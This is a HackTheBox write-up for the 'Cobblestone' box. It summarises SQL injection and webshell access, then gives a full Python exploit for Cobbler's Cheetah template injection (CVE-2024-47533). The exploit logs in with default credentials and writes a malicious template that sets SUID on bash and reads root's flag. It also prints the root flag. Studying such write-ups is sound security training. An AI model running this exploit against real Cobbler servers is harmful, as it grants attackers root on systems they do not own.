Cobblestone — HTB Box Writeup

retleave·Apr 21, 2026·7 min read

Cobblestone - HTB Box

Info

  • Type: Box (HackTheBox)
  • OS: Linux (Debian 12)
  • IP: 10.129.232.170
  • Difficulty: Medium
  • Key Topics: SQL Injection, FILE privilege abuse, Cobbler XMLRPC, Cheetah SSTI (CVE-2024-47533)

Abstract

Cobblestone is a medium-difficulty Linux box featuring a multi-stage attack chain. Initial access begins with a UNION-based SQL injection on a voting application that, combined with the MySQL FILE privilege, allows writing a webshell to disk. Credential harvesting from the database leads to SSH access as the cobble user inside a restricted shell. Privilege escalation exploits CVE-2024-47533 in Cobbler 3.3.06 -- a server-side template injection (SSTI) in the Cheetah templating engine triggered through the XMLRPC API. This writeup examines each stage in depth, with particular focus on the Cobbler exploitation path, which requires careful setup of distros, profiles, and autoinstall templates to achieve code execution as root.

Reconnaissance

Port Scanning

The target exposes only two services:
  • 22/tcp -- SSH (OpenSSH 9.2p1 Debian)
  • 80/tcp -- HTTP (Apache 2.4.62)

Virtual Host Discovery

Three virtual hosts were identified through enumeration:
  • cobblestone.htb -- Skins application (download.php, suggest_skin.php, upload.php)
  • vote.cobblestone.htb -- Voting application (login, register, suggest URL)

Content Locked

This challenge is still active on HackTheBox. The full writeup will be available after retirement.

Critically, Cheetah templates can execute arbitrary Python code using `#set` directives.

The vulnerability exists in the `generate_profile_autoinstall()` XMLRPC method. When this method is called, Cobbler:

1. Retrieves the profile's associated autoinstall template
2. Renders the template through the Cheetah engine
3. Returns the rendered output

Because the XMLRPC API allows authenticated users to **write** autoinstall templates via `write_autoinstall_template()`, an attacker with valid credentials can inject arbitrary Python code into a template and trigger its execution by calling `generate_profile_autoinstall()`.

The key distinction is that `generate_profile_autoinstall()` (profile-level) triggers the full Cheetah render pipeline, while `generate_autoinstall()` (system-level) has slightly different code paths. The profile variant is the reliable exploitation target.

### Exploitation Requirements

For the template rendering to succeed, the profile must reference a valid distro, and the distro must have a **kernel path that actually exists on the filesystem**. If the kernel file does not exist, Cobbler raises an error before reaching the template rendering stage.

We can discover valid kernel paths using the webshell or by guessing standard Debian paths:

```
/boot/vmlinuz-6.1.0-37-amd64
/boot/initrd.img-6.1.0-37-amd64
```

### Exploitation Script

```python
import xmlrpc.client

s = xmlrpc.client.ServerProxy('http://127.0.0.1:25151')
token = s.login('cobbler', 'cobbler')

# Step 1: Create a distro with real kernel paths
# The kernel must exist on disk or Cobbler refuses to render templates
did = s.new_distro(token)
s.modify_distro(did, 'name', 'pwndistro', token)
s.modify_distro(did, 'arch', 'x86_64', token)
s.modify_distro(did, 'breed', 'redhat', token)
s.modify_distro(did, 'kernel', '/boot/vmlinuz-6.1.0-37-amd64', token)
s.modify_distro(did, 'initrd', '/boot/initrd.img-6.1.0-37-amd64', token)
s.save_distro(did, token)

# Step 2: Create a profile linked to the distro
pid = s.new_profile(token)
s.modify_profile(pid, 'name', 'pwnprofile', token)
s.modify_profile(pid, 'distro', 'pwndistro', token)

# Step 3: Write a malicious Cheetah template
# #set executes Python code during template rendering
# __import__("os").system() runs shell commands as the Cobbler process (root)
payload = '#set $null = __import__("os").system("chmod u+s /usr/bin/bash")\n'
s.write_autoinstall_template('pwn.ks', payload, token)
s.modify_profile(pid, 'autoinstall', 'pwn.ks', token)
s.save_profile(pid, token)

# Step 4: Trigger the render -- this executes the payload as root
s.generate_profile_autoinstall('pwnprofile')

# Alternative: read the flag directly via template output
payload2 = '#set $out = __import__("os").popen("cat /root/root.txt").read()\n$out\n'
s.write_autoinstall_template('pwn.ks', payload2, token)
result = s.generate_profile_autoinstall('pwnprofile')
print(result)  # contains the flag
```

The Cheetah `#set` directive evaluates the right-hand side as Python code. `__import__("os")` dynamically imports the `os` module at render time, and `.popen()` or `.system()` executes commands with the privileges of the Cobbler daemon -- which is root.

## Root Flag

```
a4acfa73abfbe8e8550b30f6df44751f
```

## Key Takeaways

- **FILE privilege in MySQL** transforms SQL injection into filesystem read/write. Always check `SHOW GRANTS` for the database user.
- **Cobbler default credentials** (`cobbler:cobbler`) are a well-known attack vector. The XMLRPC API on port 25151 exposes the full management interface.
- **CVE-2024-47533** exploits the Cheetah template engine's ability to execute Python code via `#set` directives. The critical method is `generate_profile_autoinstall()`, not `generate_autoinstall()`.
- **Distro kernel paths must exist** on disk for profile rendering to succeed -- this is a non-obvious requirement that can stall exploitation.
- **Cron cleanup jobs** create operational pressure during webshell usage. Plan your command chains in advance and execute them quickly.
- **rbash restrictions** do not prevent SSH port forwarding, which is often sufficient to reach internal services.